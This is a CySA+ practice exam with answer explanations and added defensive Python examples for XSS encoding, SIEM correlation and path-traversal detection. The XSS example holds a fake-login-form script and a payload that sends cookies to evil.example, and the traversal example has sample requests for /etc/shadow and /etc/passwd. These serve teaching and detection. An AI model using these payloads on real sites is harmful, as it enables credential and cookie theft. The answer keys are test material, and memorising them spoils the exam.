CompTIA CySA+ (CS0-003) Practice Exam #4
You work as the incident response team lead at Fail to Pass Systems. Sierra, a system administrator, believes an incident has occurred on the network and contacts the SOC. At 2:30 am, you are woken up by a phone call from the CEO of Fail to Pass stating an incident has occurred and that you need to solve this immediately. As you are getting dressed to drive into the office, your phone rings again. This time, the CIO starts asking you a lot of technical questions about the incident. The first you heard of this incident was 5 minutes ago from the CEO, so you obviously don't have the answers to the CIO's questions. Based on this scenario, which of the following issues needs to be documented in your lessons learned report once this incident is resolved? An established incident response form for all employees to use to collect data A call list/escalation list An offline incident response jump bag or kit A robust metho
A call list/escalation list To maintain a disciplined approach to incident response, the organization needs to document and follow procedures developed during the preparation phase. The SOC should have a call list or an escalation list as part of those procedures. This list should detail who should be called, in what order, and how high up the organizational leadership chart a particular issue should reach. In almost every case, the incident response team lead should be contacted before the CEO or CIO is notified of the incident. When companies go "right to the top" of the leadership chart, the CEO and CIO end up acting on half-true or unverified information at the start of the incident response process. Instead, an established form for incident detail collection should be used, the right technical leads should be notified of the incident, and the incident response team should be called in to analyze the information and provide a quick "stand up" report to leadership on what the issue is, what has already been done, and what they recommend doing from here to resolve the incident. All of the other options are best practices to consider and develop in the preparation phase. Still, they would not have solved the issue in this scenario of senior leadership being notified before the incident response team lead.
What is a buffer overflow vulnerability? A problem with the encryption of data An issue with a website's user interface An issue with the database query operation A weakness allowing an attacker to overflow an application's buffer, causing it to crash or execute arbitrary code
A weakness allowing an attacker to overflow an application's buffer, causing it to crash or execute arbitrary code A buffer overflow vulnerability lets an attacker write more data into a fixed-size buffer than it can hold, corrupting adjacent memory (such as saved return addresses or heap metadata). Depending on what gets overwritten, the result is a crash or the execution of attacker-controlled code. Database query operations might be vulnerable to SQL injection, not buffer overflows. While important for user experience and as a phishing target, user interface issues are not directly related to buffer overflow vulnerabilities. Encryption problems are related to cryptography, not buffer overflow vulnerabilities.
In the Colonial Pipeline ransomware attack, the DarkSide ransomware group fulfilled their intent by encrypting files and demanding a ransom. Which phase of the Cyber Kill Chain does this represent? Command and Control Actions and Objectives Weaponization Reconnaissance
Actions and Objectives The Actions and Objectives phase of the Cyber Kill Chain involves fulfilling the adversary's intent, such as data exfiltration, data destruction, or encryption for ransom. This is represented in the Colonial Pipeline attack by the DarkSide ransomware group encrypting files and demanding a ransom. Reconnaissance involves gathering information about the target system, not fulfilling the adversary's intent. Weaponization involves creating a malicious payload, not fulfilling the adversary's intent. Command and Control involves maintaining communication with the compromised system, not fulfilling the adversary's intent.
Referencing the infamous WannaCry ransomware attack, where the attackers exploited a vulnerability in Microsoft's SMB protocol using an NSA tool known as EternalBlue, which phase of the Cyber Kill Chain was the usage of EternalBlue part of? Command and Control Actions and Objectives Weaponization Delivery
Weaponization In the context of the WannaCry ransomware attack, EternalBlue (an exploit developed by the NSA and later leaked by the Shadow Brokers) was paired with the ransomware payload to attack a known vulnerability in Microsoft's SMBv1 implementation (MS17-010). Of the options offered, that coupling of an exploit with a payload is the weaponization phase. Note that in Lockheed Martin's model, the moment the exploit actually fires against the victim's SMB service belongs to the exploitation phase, which is not one of the choices here. Command and control refers to the phase where the attacker establishes a channel to control the compromised system. The Actions and Objectives phase would be when the attackers actually encrypted the files and demanded the ransom. The delivery phase involves the transmission of the malicious payload to the victim, not the creation of it.
Your organization has identified a threat actor offering stolen customer data for sale on a dark web forum. In this situation, what course of action might your threat intelligence team be expected to take? Contacting the threat actor to negotiate the return of the data Ignoring the threat because it's not an active breach Alerting the incident response team and working with them to mitigate any potential harm Launching a retaliatory cyber attack
Alerting the incident response team and working with them to mitigate any potential harm In the face of a potential threat like this, the threat intelligence team would generally alert the incident response team and work with them to protect the organization and its customers. It is not generally advisable, or often legal, for an organization to engage directly with threat actors. Professional security teams should be involved in these situations. Retaliatory cyber attacks are both legally and ethically problematic and could lead to serious consequences. This is not the right course of action. Ignoring a potential threat, particularly one that involves customer data, would not be a safe or responsible course of action.
As a cybersecurity analyst conducting vulnerability scans, you have just completed your first scan of an enterprise network comprising over 10,000 workstations. As you examine your findings, you note that you have less than 1 critical finding per 100 workstations. Which of the following statement does BEST explain these results? The scanner failed to connect with the majority of workstations An uncredentialed scan of the network was performed The scanner was not compatible with the devices on your network The network has an exceptionally strong security posture
An uncredentialed scan of the network was performed Uncredentialed scans are generally unable to detect many vulnerabilities on a device. When conducting an internal assessment, you should perform an authenticated (credentialed) scan of the environment to most accurately determine the network's vulnerability posture. In most enterprise networks, if a vulnerability exists on one machine, it also exists on most other workstations since they use a common baseline or image. If the scanner failed to connect to the workstations, an error would have been generated in the report.
Which of the following type of solutions would you classify an FPGA as? Trusted platform module Anti-tamper Root of trust Hardware security module
Anti-tamper A field-programmable gate array (FPGA) is used here as an anti-tamper mechanism: a programmable logic device combined with a physically unclonable function (PUF). The PUF generates a digital fingerprint based on the unique physical characteristics of the device. This means that tampering with a device, such as removing the chip or adding an unknown input/output mechanism, can be detected, and a remedial action, such as zero-filling cryptographic keys, can be performed automatically. A hardware security module (HSM) is an appliance for generating and storing cryptographic keys. It is a solution that may be less susceptible to tampering and insider threats than a traditional software-based storage solution. A trusted platform module (TPM) is a specification for hardware-based storage of digital certificates, cryptographic keys, hashed passwords, and other user and platform identification information. A hardware root of trust (RoT) or trust anchor is a secure subsystem that can provide attestation to declare something as true.
An SNMP sweep is being conducted, but the sweep receives no-response replies from multiple addresses that are believed to belong to active hosts. What does this indicate to a cybersecurity analyst? The community string being used is invalid The machines are not running SNMP servers Any listed answers may be true The machines are unreachable
Any listed answers may be true The best option is that all of the answers listed may be true. SNMP runs over UDP, so a closed port produces no SNMP reply (at most an ICMP port unreachable message that a sweep tool may not surface), and an SNMPv1/v2c agent silently drops requests that carry an invalid community string rather than returning an error. A "no response" can therefore mean that the systems cannot be reached (either internally or externally), that no SNMP agent is listening, or that the community string you supplied is wrong. A sweep alone cannot distinguish between these cases; confirm reachability with a separate probe and verify the community string against a known-good host before drawing conclusions.
Michelle has just finished installing a new database application on her server. She then proceeds to uninstall the sample configuration files, properly configures the application settings, and updates the software to the latest version according to her company's policy. What best describes the actions Michelle just took? Input validation Vulnerability scanning Application hardening Patch management
Application hardening Application hardening involves taking actions to best secure the application from attack. This involves removing any default or sample configurations, properly configuring settings, and updating the application to the latest, more secure version. Patch management is incorrect because only updating the software falls under patch management, not the configuration portions of her actions. Vulnerability scanning involves scanning a device for known vulnerabilities so the device can be updated to prevent a future attack. Input validation is a technique to verify user-provided data meets the expected length and type before allowing a program to utilize it.
According to the Center for Internet Security's system design recommendation, which of the following control categories would contain information on the best security practices to implement within the SDLC? Inventory of authorized/unauthorized devices Malware defenses Controlled use of administrative privileges Application software security
Application software security Since the software development lifecycle (SDLC) is focused on building software applications, the best control category would be application software security. While all other documents hosted by the Center for Internet Security contain useful information, the application software security control is most likely to contain relevant information relating to best practices to implement in the SDLC.
Which term defines the collection of all points from which an adversary could interact with a system and cause it to function in a way other than how it was designed? Attack vector Threat model Adversary capability set Attack surface
Attack surface The collection of all points from which an adversary may attack is considered the attack surface. The attack vector represents the specific points an adversary has chosen for a particular attack. The threat model defines the behavior of the adversary. An adversary capability set is the list of items an adversary can use to conduct their attack.
Which of the following techniques listed below are not appropriate to use during a passive reconnaissance exercise against a specific target company? BGP looking glass usage Registrar checks WHOIS lookups Banner grabbing
Banner grabbing Banner grabbing requires a connection to the host to grab the banner successfully. This is an active reconnaissance activity. All other options are considered passive processes and typically use information retrieved from third parties, without directly connecting to the target organization's hosts.
In the event of a cybersecurity breach, what legal aspects should primarily be considered when communicating with external stakeholders? Public relations strategy Internal corporate policy Contractual obligations with clients or partners Compliance with data breach notification laws
Compliance with data breach notification laws Legal considerations primarily involve complying with local, national, or international data breach notification laws and regulations, which typically require the organization to notify affected parties within a certain timeframe. While internal policies are important, they do not typically carry the legal weight that breach notification laws do. Compliance with these laws should be a primary consideration. While managing public relations is a crucial aspect of breach communication, it does not directly involve legal considerations. While important, contractual obligations are specific to individual relationships and may not have the broad legal implications that breach notification laws do.
Upper management at DionTech Innovations has noticed that its employees frequently download potentially harmful attachments from phishing emails. What should the company do to mitigate this risk? Purchase new email software Fire all employees who download harmful attachments Conduct regular training sessions to teach employees how to recognize and avoid phishing emails Make employees sign a liability waiver for potential damages from phishing attacks
Conduct regular training sessions to teach employees how to recognize and avoid phishing emails Regular training plays a crucial role in mitigating the risk of employees falling victim to phishing attacks. By providing ongoing education and awareness programs, employees become more knowledgeable about the tactics and techniques used in phishing attempts. This training equips them with the skills to recognize and report suspicious emails, links, or requests, thereby reducing the likelihood of falling for phishing scams. Making employees sign a liability waiver might discourage careless behavior, but it does not equip them with the knowledge to avoid phishing attempts. Firing every employee who downloads a harmful attachment may seem like a direct solution, but it is not practical or effective in the long term; education is a more effective approach. Purchasing new email software may offer better spam filters, but it cannot fully prevent phishing attempts, which often rely on social engineering.
Among the following vulnerabilities, which one was reported as a "Top 10" due to its common occurrence and the potential severity of its impact? Poodle Attack Cross-Site Scripting (XSS) SolarWinds SUNBURST Attack Spectre Attack
Cross-Site Scripting (XSS) XSS vulnerabilities are widespread across web applications and can lead to serious consequences, such as session hijacking and user data theft, which is why XSS appears in the OWASP Top 10 (as its own category through the 2017 edition, and folded into the Injection category in 2021). The SolarWinds SUNBURST was a severe, targeted supply chain attack, not a common vulnerability class like XSS. The Spectre attack was an impactful hardware vulnerability, but it's not categorized as a top 10 vulnerability. While the POODLE attack was significant and impacted the SSL 3.0 protocol, it is not categorized as a top 10 widespread vulnerability.
Tony works for a company as a cybersecurity analyst. His company runs a website that allows public postings. Recently, users have started complaining about the website having pop-up messages asking for their username and password. Simultaneously, your security team has noticed a large increase in the number of compromised user accounts on the system. What type of attack is most likely the cause of both of these events? Cross-site request forgery SQL injection Cross-site scripting Rootkit
Cross-site scripting This scenario is a textbook example of the effects of a stored cross-site scripting (XSS) attack. If the application does not validate posted content and does not encode it for the HTML context it is rendered in, an attacker can post a script that every visitor's browser then executes, for example to create a fake login popup that collects passwords and uses them to compromise further accounts. A cross-site request forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. An XSS allows an attacker to execute arbitrary JavaScript within the victim's browser (such as creating pop-ups), whereas a CSRF allows an attacker to induce a victim to perform actions they do not intend to perform. A rootkit is a set of software tools that enable an unauthorized user to control a computer system without being detected. SQL injection is the placement of malicious code in SQL statements via web page input. None of the symptoms described in this scenario would indicate a CSRF, rootkit, or SQL injection.
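The rendering mistake behind this scenario, shown as an added example (not code from the practice exam or from the site it describes). The post bodies and the attribute-breakout string are constructed payloads, and the two render functions are hypothetical stand-ins for the site's template: one concatenates user input into HTML, the other encodes it for the context it lands in. The parser-based check then confirms which version still hands the browser something executable.

```python
import html
from html.parser import HTMLParser

# Constructed payloads standing in for what an attacker might post on the site in the scenario.
MALICIOUS_POST = ('<script>document.body.innerHTML="<form>Session expired, log in again: '
                  '<input name=u><input name=p type=password></form>"</script>')
ATTRIBUTE_BREAKOUT = '" onmouseover="fetch(`//evil.example/?c=`+document.cookie)'


def render_post_unsafe(author: str, body: str) -> str:
    """Vulnerable: user-controlled strings are concatenated straight into the HTML."""
    return f'<div class="post" data-author="{author}"><p>{body}</p></div>'


def render_post_safe(author: str, body: str) -> str:
    """Hardened: every user-controlled value is HTML-encoded for the context it lands in.
    quote=True also encodes the quote characters, which is what stops attribute breakouts."""
    return (f'<div class="post" data-author="{html.escape(author, quote=True)}">'
            f'<p>{html.escape(body, quote=True)}</p></div>')


class ActiveContentFinder(HTMLParser):
    """Records script tags and on* event-handler attributes that a browser would execute."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name}")


def active_content(rendered: str) -> list:
    """Parse the rendered markup the way a browser would and list executable content found."""
    finder = ActiveContentFinder()
    finder.feed(rendered)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for render in (render_post_unsafe, render_post_safe):
        print(render.__name__,
              active_content(render("alice", MALICIOUS_POST)),
              active_content(render(ATTRIBUTE_BREAKOUT, "hello")))
```

The safe version relies on output encoding rather than trying to strip "bad" tags from input; a blocklist would have to anticipate every encoding trick, while `html.escape` makes `<`, `>`, `&` and both quote characters inert regardless of what the attacker sends. Encoding must match the context: the `quote=True` flag matters for attribute values, and content placed inside a `<script>` block or a URL would need JavaScript or URL encoding instead.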
During a simulated attack on your organization's network, the red team identified several vulnerabilities and successfully exfiltrated data. The red team then used these vulnerabilities and the steps they took to create an example of a possible real-world attack. Which framework does this attack sequence BEST represent? Diamond Model of Intrusion Analysis OWASP Testing Guide Cyber Kill Chain MITRE ATT&CK
Cyber Kill Chain The Cyber Kill Chain, developed by Lockheed Martin, describes the stages of a cyber attack. The steps taken by the red team align with this model, from the identification of vulnerabilities (reconnaissance), through exploitation and installation, to achieving their objectives (exfiltration). The OWASP Testing Guide provides a methodology for testing the security of web applications. It doesn't describe the stages of a cyber attack. The Diamond Model focuses on the relationship between four elements of an attack: the adversary, the victim, the infrastructure, and the capability. It doesn't represent a sequential progression of an attack. The MITRE ATT&CK framework provides a matrix of tactics, techniques, and procedures (TTPs) used by cyber adversaries. While it's useful for detailing attacker behavior, it doesn't provide a linear progression of an attack.
You have just run the following commands on your Linux workstation:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DionTraining:~ root# ls
Names.txt
DionTraining:~ root# more Names.txt
DION
DIOn
DIon
Dion
dion
DionTraining:~ root# grep -i DION Names.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Which of the following options would be included as part of the output for the grep command issued? (SELECT ALL THAT APPLY) DIOn Dion DION dion Dion
DIOn Dion DION dion Dion The grep (global regular expression print) command is one of Linux's most powerful search tools. The general syntax for the grep command is "grep [options] pattern [files]". The command searches within the specified files (in this case, the Names.txt file). When the command is issued with the -i flag, it treats the specified pattern as case insensitive. Therefore, every uppercase and lowercase variation of the word "DION" in the file is matched and displayed as the command output. By default, grep is case sensitive, so "grep DION Names.txt" would only display "DION" and ignore the other variations. As a cybersecurity analyst, grep is one of your most important tools. You can use regular expressions (regex) with grep to quickly find indicators of compromise within your log files.
After an unexpected data breach, the cybersecurity team at a financial institution analyzed logs and found suspicious traffic originating from an IP address known to be linked with the WannaCry ransomware attack. In this scenario, what incident response activity is being performed by the cybersecurity team? Recovery Eradication Data and log analysis Containment
Data and log analysis The cybersecurity team is performing data and log analysis, a key incident response activity. They are analyzing logs to identify the cause of the data breach and determine the extent of the intrusion. Recovery involves restoring systems to normal operation and implementing measures to prevent future similar attacks. The team hasn't reached this stage yet; they are still analyzing logs to understand what happened. Containment is the process of limiting the extent of an intrusion and preventing it from spreading further. In this scenario, the team is analyzing data and logs, not containing the breach. Eradication involves eliminating the threat from the network, which can't be done until the threat is fully understood. The team is still at the analysis stage.
You are working as a junior cybersecurity analyst and utilize a SIEM to support investigations into ongoing incidents. The SIEM is configured to collect data from numerous sources across the network, including network sensors, routers, switches, firewalls, hosts, and servers. Unfortunately, due to the number of data sources, you have data about a particular event being detected by different sensors and devices. Which of the following must you ensure to make sense of all the data being collected by your SIEM before analyzing it? Data recovery Data correlation Data retention Data sanitization
Data correlation Data correlation is the first step in making sense of data from across numerous sensors. It places each record in context with the other records the system holds about the same host, address, user, or time window. For example, if your IDS detected an incident, host logs were collected, and your packet capture system collected the network traffic, the SIEM can correlate all three pieces of information from these different systems to allow an analyst to understand the event better. Conducting data correlation allows an analyst to identify a pattern more clearly and take action. Data correlation should be performed as soon as the SIEM indexes the data, which in practice requires consistent timestamps (synchronized clocks and a common time zone) and normalized field names across sources.
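What the correlation step described above does, reduced to an added Python example (not code from the practice exam or from any particular SIEM product). The three log formats, the IP addresses, and the log lines are all constructed for the example; the pivot is the internal address, and the window is a hypothetical 60 seconds either side of each IDS alert.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Constructed log lines in three made-up formats (IDS sensor, firewall, endpoint agent).
SAMPLE_LOGS = [
    '2024-05-01T02:31:05Z ids alert sig="ET TROJAN Beacon Observed" src=10.0.0.23 dst=203.0.113.9',
    '2024-05-01T02:31:07Z fw ACCEPT src=10.0.0.23 dst=203.0.113.9 dport=443',
    '2024-05-01T02:31:02Z host=WS-023 ip=10.0.0.23 event=process_start image=powershell.exe',
    '2024-05-01T02:31:08Z fw ACCEPT src=10.0.0.50 dst=198.51.100.7 dport=443',
    '2024-05-01T02:45:00Z host=WS-023 ip=10.0.0.23 event=process_start image=notepad.exe',
    'garbage line the parser cannot understand',
]

IDS_RE = re.compile(r'^(?P<ts>\S+) ids alert sig="(?P<sig>[^"]+)" src=(?P<src>\S+) dst=(?P<dst>\S+)$')
FW_RE = re.compile(r'^(?P<ts>\S+) fw (?P<action>\w+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)$')
HOST_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) ip=(?P<ip>\S+) event=(?P<event>\S+) image=(?P<image>\S+)$')


@dataclass
class Event:
    ts: datetime
    source: str   # which sensor produced it: ids, fw or host
    ip: str       # the internal address the record is about (the pivot key)
    detail: str


def parse_ts(text: str) -> datetime:
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def normalize(line: str):
    """Map each vendor format onto the common Event schema; unknown lines are dropped."""
    if m := IDS_RE.match(line):
        return Event(parse_ts(m["ts"]), "ids", m["src"], f'{m["sig"]} -> {m["dst"]}')
    if m := FW_RE.match(line):
        return Event(parse_ts(m["ts"]), "fw", m["src"], f'{m["action"]} {m["dst"]}:{m["dport"]}')
    if m := HOST_RE.match(line):
        return Event(parse_ts(m["ts"]), "host", m["ip"], f'{m["event"]} {m["image"]} on {m["host"]}')
    return None


def correlate(lines, window_seconds: int = 60):
    """For every IDS alert, gather what the other sensors saw for the same address
    within +/- window_seconds, and return one incident record per alert."""
    events = [e for e in map(normalize, lines) if e is not None]
    window = timedelta(seconds=window_seconds)
    incidents = []
    for alert in (e for e in events if e.source == "ids"):
        related = sorted(
            (e for e in events
             if e is not alert and e.ip == alert.ip and abs(e.ts - alert.ts) <= window),
            key=lambda e: e.ts,
        )
        incidents.append({
            "ip": alert.ip,
            "alert": alert.detail,
            "sources": sorted({e.source for e in related} | {"ids"}),
            "timeline": [(e.ts.isoformat(), e.source, e.detail) for e in related],
        })
    return incidents


if __name__ == "__main__":
    for incident in correlate(SAMPLE_LOGS):
        print(incident["ip"], incident["alert"], incident["sources"])
        for entry in incident["timeline"]:
            print("   ", *entry)
```

Normalization comes first because the three sources name the same facts differently (`src=` versus `ip=`) and correlation can only pivot on a common field. The unrelated firewall entry from 10.0.0.50 and the notepad.exe start fourteen minutes later are both excluded, which is the point of keying on address and time together rather than on either alone.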
During which phase of the Cyber Kill Chain would an attacker transmit the malicious payload to the victim, typically via email, web, or USB? Command and Control Delivery Reconnaissance Installation
Delivery The delivery phase of the Cyber Kill Chain involves transmitting the malicious payload to the victim. Command and Control involves maintaining communication with the compromised system, not delivering the malicious payload. Reconnaissance involves gathering information about the target system, not delivering the malicious payload. Installation involves the payload setting up a foothold on the compromised system, not delivering the malicious payload.
Matt is creating a scoping worksheet for an upcoming penetration test for his organization. Which of the following techniques is NOT usually included in a penetration test? Social engineering Reverse engineering Denial-of-service attacks Physical penetration attempts
Denial-of-service attacks A denial-of-service (DoS) attack isn't usually included as part of a penetration test. This type of attack carries too much risk of disrupting production systems for most organizations to allow it in an assessment scope; where it is wanted, it must be called out explicitly in the rules of engagement, with agreed targets and maintenance windows. Social engineering, physical penetration attempts, and reverse engineering are all commonly included in a penetration test's scope.
Which of the following types of capabilities would an adversary need to identify and exploit zero-day vulnerabilities? Developed Advanced Integrated Acquired and augmented
Developed In this model of adversary capability, developed capabilities are those that can identify and exploit zero-day vulnerabilities. Acquired and augmented refers to the utilization of commodity malware and techniques (e.g., script kiddies). Advanced capabilities refer to those that can introduce vulnerabilities through the supply chain in proprietary and open-source products. Integrated capabilities involve non-cyber tools such as political or military assets.
Which of the following will an adversary do during the delivery phase of the Lockheed Martin kill chain? (SELECT THREE) Collect press releases, contract awards, and conference attendee lists Direct action against public-facing servers Adversary triggering exploits for non-public facing servers Deliberate social media interactions with the target's personnel Select a decoy document to present to the victim Release of malicious email
Direct action against public-facing servers Deliberate social media interactions with the target's personnel Release of malicious email During the delivery phase, the adversary is firing whatever exploits they prepared during the weaponization phase. At this stage, they still do not have access to their target. Therefore, taking direct action against a public-facing web server, sending a spear-phishing email, placing a USB drive with malware, or starting a conversation on social media all fit within this phase. Triggering exploits against non-public-facing servers requires a foothold already inside the network, so it belongs to the exploitation phase, and the internet-facing servers themselves were enumerated earlier during reconnaissance. Selecting a decoy document to present to the victim occurs during weaponization. Collecting press releases, contract awards, and conference attendee lists occurs during the reconnaissance phase.
A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/../../../../etc/shadow. What type of attack has likely occurred? XML injection Buffer overflow SQL injection Directory traversal
Directory traversal This is an example of a directory traversal. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with "dot-dot-slash (../)" sequences and their variations (including URL-encoded forms such as %2e%2e%2f) or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer's boundary to overwrite an adjacent memory location. XML injection is an attack technique used to manipulate or compromise an XML application or service's logic. SQL injection is the placement of malicious code in SQL statements via web page input.
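Two sides of the traversal problem as an added Python example (not code from the practice exam): a log-review check that flags traversal attempts in proxy entries, including the percent-encoded, double-encoded and backslash variants that a naive search for "../" misses, and the server-side resolution check that would have stopped the request. The proxy log lines, the document root `/var/www/html` and the log format are all constructed for the example.

```python
import os
from typing import List, Optional
from urllib.parse import unquote, urlsplit

WEBROOT = "/var/www/html"  # assumed document root for this example

# Constructed proxy log lines in the form "<timestamp> <client> <method> <url>".
SAMPLE_PROXY_LOG = [
    "2024-05-01T10:00:01Z 10.0.0.23 GET http://test.diontraining.com/../../../../etc/shadow",
    "2024-05-01T10:00:02Z 10.0.0.24 GET http://test.diontraining.com/images/logo.png",
    "2024-05-01T10:00:03Z 10.0.0.23 GET http://test.diontraining.com/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    "2024-05-01T10:00:04Z 10.0.0.23 GET http://test.diontraining.com/%252e%252e/%252e%252e/etc/passwd",
    "2024-05-01T10:00:05Z 10.0.0.23 GET http://test.diontraining.com/..\\..\\windows\\win.ini",
]


def decode_path(raw_path: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so %2e%2e%2f and the
    double-encoded %252e%252e%252f both unwrap, then treat backslashes as
    separators the way Windows web servers do."""
    path = raw_path
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def is_traversal(url: str) -> bool:
    """True when any path segment is '..' once the path has been fully decoded."""
    return any(seg == ".." for seg in decode_path(urlsplit(url).path).split("/"))


def flag_proxy_log(lines: List[str]) -> List[str]:
    """Return the URLs from the constructed log format that contain a traversal attempt."""
    return [line.split()[-1] for line in lines if is_traversal(line.split()[-1])]


def resolve_under_root(requested: str, root: str = WEBROOT) -> Optional[str]:
    """Server-side defence: resolve the requested path and refuse anything that
    escapes the document root. normpath keeps this example offline-deterministic;
    on a live server use os.path.realpath so symlinks are followed before the check."""
    relative = decode_path(requested).lstrip("/")
    candidate = os.path.normpath(os.path.join(root, relative))
    # commonpath, not startswith, so that /var/www/html-evil is not accepted as inside root
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for url in flag_proxy_log(SAMPLE_PROXY_LOG):
        print("traversal attempt:", url)
    print(resolve_under_root("/images/logo.png"), resolve_under_root("/../../../../etc/shadow"))
```

The detection decodes before it matches because proxies and WAFs that only look for the literal string "../" are routinely bypassed with encoding. The resolution check works on the normalized absolute path rather than on the request string, so it does not need to know every way of spelling "..".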
As part of your organization's proactive threat hunting, you're considering gathering threat intelligence from the deep web and dark web. What could be a significant benefit of this approach? Discovering potential threats before they impact your organization Eliminating all cyber threats Increasing the organization's web presence Avoiding the need for other security measures
Discovering potential threats before they impact your organization Gathering threat intelligence from the deep web and dark web can help your organization identify emerging threats or planned attacks before they affect your network. While gathering intelligence can help identify and mitigate threats, it does not guarantee the elimination of all cyber threats. Gathering threat intelligence is a part of a broader security strategy and should be used in conjunction with other security measures, not in lieu of them. Gathering threat intelligence from the deep web and dark web is not related to increasing an organization's web presence; it's about identifying potential cyber threats.
Your organization is a financial services company. You have a team of security analysts who are responsible for gathering and analyzing intelligence about potential threats to your organization. The analysts recently published a report that identifies a new threat actor who is targeting financial services companies. The report includes information about the threat actor's tactics, techniques, and procedures (TTPs). In which phase of the security intelligence cycle will this information be provided to those who need to act on it? Analysis Collection Dissemination Feedback
Dissemination The dissemination phase refers to publishing the information produced by analysis to the consumers who need to act on it. The collection phase is usually implemented by administrators using various software suites, such as security information and event management (SIEM). This software must be configured with connectors or agents that can retrieve data from sources such as firewalls, routers, IDS sensors, and servers. The analysis phase focuses on converting collected data into useful information or actionable intelligence. The final phase of the security intelligence cycle is feedback and review, which draws on input from both intelligence producers and intelligence consumers. This phase aims to improve the implementation of the requirements, collection, analysis, and dissemination phases as the life cycle matures.
The CIO has recently made a purchasing decision to install a new security appliance that will automatically sandbox all attachments as they enter the enterprise network to run dynamic and static code analysis on them. Which of the following questions about the appliance should you consider as the SOC manager responsible for operating this new appliance for the company? (SELECT FOUR) Does the new appliance provide a detailed report or alert showing why it believes an attachment is malicious? How will the appliance receive security patches and updates? Will the device inadvertently alter anyone's data when it is analyzed in the sandbox? Do you have security personnel and procedures in place to review the output from this appliance and take action where appropriate? Will the security appliance violate your employee's right to privacy? How will the appliance receive updated signatures and scanning engines?
Does the new appliance provide a detailed report or alert showing why it believes an attachment is malicious? How will the appliance receive security patches and updates? Do you have security personnel and procedures in place to review the output from this appliance and take action where appropriate? How will the appliance receive updated signatures and scanning engines? Often, cybersecurity professionals fall in love with a new technological solution without fully considering the true cost of ownership and the risks it poses to their organization. Even if this is the perfect security mechanism, the organization must plan for how it will respond to the alerts the appliance produces. Additionally, you must consider whether you have the right people and procedures to use the new appliance effectively. The appliance will also need to receive security patches, feature updates, and signature definition files routinely to remain effective and secure. At later stages of analysis, your security team may need to determine why a false positive or false negative occurred, which requires detailed alerts or reports from the appliance. In corporate environments, privacy is limited for employees, as most companies have a "right to monitor" included as part of their AUP and access policies, so privacy is a minimal area of concern in this case. The appliance does not manipulate the information passing through it, since it analyzes a copy placed into the sandbox. This allows it to make an allow-or-deny decision without modifying the original data as it is processed.
When using the netstat command during an analysis, which of the following connection status messages indicates whether an active connection between two systems exists? LISTENING LAST_ACK ESTABLISHED CLOSE_WAIT
ESTABLISHED The ESTABLISHED state indicates that an active connection has been set up between two systems. The LISTENING state indicates that the socket is waiting for an incoming connection from a second system. The LAST_ACK state indicates that the remote end has shut down the connection and the local socket is closed, waiting for a final acknowledgment. The CLOSE_WAIT state indicates that the remote end has shut down the connection and the local application has not yet closed its socket. This question may seem beyond the scope of the exam. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goal isn't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!
Which of the following proprietary tools is used to create forensic disk images without making changes to the original evidence? Autopsy dd FTK Imager Memdump
FTK Imager FTK Imager can create perfect copies or forensic images of computer data without making changes to the original evidence. The forensic image is identical in every way to the original, including file slack and unallocated space or drive free space. The dd tool can also create forensic images, but it is not a proprietary tool since it is open-source. Memdump is used to collect the content within RAM on a given host. Autopsy is a cross-platform, open-source forensic tool suite.
A software assurance laboratory performs a dynamic assessment on an application by automatically generating random data sets and inputting them in an attempt to cause an error or failure condition. Which of the following is the laboratory performing? Security regression testing Fuzzing Stress testing User acceptance testing
Fuzzing Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, failing built-in code assertions, or potential memory leaks. User Acceptance Testing is the process of verifying that a created solution/software works for the user. Security regression testing ensures that changes made to a system do not harm its security; it is therefore of high significance, and interest in such approaches has steadily increased. Stress testing verifies the system's stability and reliability by measuring its robustness and error handling capabilities under heavy load conditions.
Which role validates the user's identity when using SAML for authentication? User agent RP IdP SP
IdP The IdP provides the validation of the user's identity. Security Assertion Markup Language (SAML) is an XML-based framework for exchanging security-related information such as user authentication, entitlement, and attributes. SAML is often used in conjunction with SOAP. SAML is a solution for providing single sign-on (SSO) and federated identity management. It allows a service provider (SP) to establish a trust relationship with an identity provider (IdP) so that the SP can trust the identity of a user (the principal) without the user having to authenticate directly with the SP. The principal's user agent (typically a browser) requests a resource from the service provider (SP). The resource host can also be referred to as the relying party (RP). If the user agent does not already have a valid session, the SP redirects the user agent to the identity provider (IdP). The IdP requests the principal's credentials if not already signed in and, if they are correct, provides a SAML response containing one or more assertions. The SP verifies the signature(s) and (if accepted) establishes a session and provides access to the resource.
In order to improve efficiency in your security operations, you want to minimize human engagement. Which of the following actions would be most effective in achieving this goal? Increasing the number of security platforms Implementing automation for routine tasks Reducing staff training Limiting access to systems
